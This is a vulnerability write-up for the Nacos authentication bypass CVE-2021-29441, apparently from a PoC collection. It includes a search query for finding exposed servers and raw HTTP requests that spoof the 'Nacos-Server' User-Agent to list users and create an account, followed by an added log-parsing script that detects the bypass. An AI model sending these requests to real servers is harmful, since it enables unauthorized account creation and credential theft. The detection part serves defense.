POC/wpoc/Nacos/Nacos未授权访问漏洞(CVE-2021-29441).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

# Nacos Unauthenticated Access Vulnerability (CVE-2021-29441)
# I. Vulnerability overview
<font style="color:rgb(63, 63, 63);">Nacos is an open-source project from Alibaba: a dynamic service discovery, configuration management and service management platform that makes building cloud-native applications easier. It is designed to help discover, configure and manage microservices, and provides a simple, easy-to-use feature set for dynamic service discovery, service configuration, service metadata and traffic management. The vulnerability lies in Nacos's authentication and authorization logic: it checks whether the request's User-Agent is "Nacos-Server" and, if so, performs no authentication at all. The developers intended this to handle server-to-server requests, but the check is overly simple and the agreed User-Agent "Nacos-Server" is hard-coded in the source, which is what creates the vulnerability. Through this unauthenticated access an attacker can obtain sensitive information such as usernames and passwords.</font>
# <font style="color:rgb(63, 63, 63);">II. Affected versions</font>
+ <font style="color:rgb(63, 63, 63);">Nacos <= 2.0.0-ALPHA.1</font>
# <font style="color:rgb(63, 63, 63);">III. Asset discovery</font>
+ Hunter: `app.name="Nacos"`
+ Fingerprint
![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/MraeKPVNc9lFkzMT/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-600623.png)
# IV. Reproduction
PoC
```plain
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
```
![1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48.png](./img/MraeKPVNc9lFkzMT/1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48-585785.png)
Adding an account through the unauthenticated access
```plain
POST /nacos/v1/auth/users HTTP/1.1
Host:
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=test&password=test
```
![1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6.png](./img/MraeKPVNc9lFkzMT/1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6-376550.png)
Check whether the account was added
```plain
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
```
![1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839.png](./img/MraeKPVNc9lFkzMT/1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839-049495.png)
Log in with the added account
![1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d.png](./img/MraeKPVNc9lFkzMT/1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d-182574.png)
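Detection logic for the traffic pattern shown in the PoC above, as an added example that is not part of the original page: it parses access-log lines in nginx combined format (assuming a reverse proxy in front of Nacos writes such a log; the sample lines are constructed) and flags requests that carry the hard-coded `Nacos-Server` User-Agent from hosts outside an operator-supplied set of cluster peers (`cluster_members`, a hypothetical allow-list), ranking hits against the `/nacos/v1/auth/` API highest.

```python
import re

# Constructed sample lines (not captured from any real system) in nginx "combined" format,
# which records the request line, status and User-Agent; a reverse proxy in front of
# Nacos is assumed to write this log. The first two lines mimic the PoC requests above.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Oct/2024:15:59:45 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1" 200 512 "-" "Nacos-Server"
203.0.113.5 - - [28/Oct/2024:15:59:50 +0800] "POST /nacos/v1/auth/users HTTP/1.1" 200 16 "-" "Nacos-Server"
198.51.100.7 - - [28/Oct/2024:16:00:01 +0800] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 340 "-" "Nacos-Server"
192.0.2.9 - - [28/Oct/2024:16:00:12 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1" 403 98 "-" "Mozilla/5.0"
192.0.2.9 - - [28/Oct/2024:16:00:20 +0800] "POST /nacos/v1/auth/login HTTP/1.1" 200 200 "-" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

BYPASS_UA = "Nacos-Server"           # the hard-coded value that skips authentication
AUTH_PREFIX = "/nacos/v1/auth/"      # user/role/permission API
USERS_PATH = "/nacos/v1/auth/users"  # listing (GET) or creating (POST) accounts
WRITE_METHODS = ("POST", "PUT", "DELETE")

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def analyze(log_text, cluster_members):
    """Flag requests carrying the Nacos-Server User-Agent from hosts that are not
    known cluster peers (cluster_members: set of IPs, assumed to be maintained by
    the operator). Returns one dict per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["ua"] != BYPASS_UA or rec["ip"] in cluster_members:
            continue
        path = rec["path"].split("?", 1)[0]
        if path == USERS_PATH and rec["method"] in WRITE_METHODS:
            kind = "account_change_via_ua_bypass"   # account created/changed with no auth
        elif path.startswith(AUTH_PREFIX):
            kind = "auth_api_read_via_ua_bypass"    # e.g. listing users and password hashes
        else:
            kind = "peer_ua_from_unknown_source"    # any other API reached with the spoofed UA
        findings.append({"ip": rec["ip"], "time": rec["time"], "method": rec["method"],
                         "path": path, "status": int(rec["status"]), "kind": kind})
    return findings

if __name__ == "__main__":  # demo on the constructed log; 10.0.0.2 is a made-up legitimate peer
    print(*analyze(SAMPLE_LOG, {"10.0.0.2"}), sep="\n")
```

On a real deployment, feed the proxy's access log to `analyze` and treat `account_change_via_ua_bypass` hits as confirmed compromise indicators rather than alerts to triage.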
> Updated: 2024-10-28 15:59:45
> Source: <https://www.yuque.com/xiaokp7/ocvun2/gygvcmtv1bh6n6za>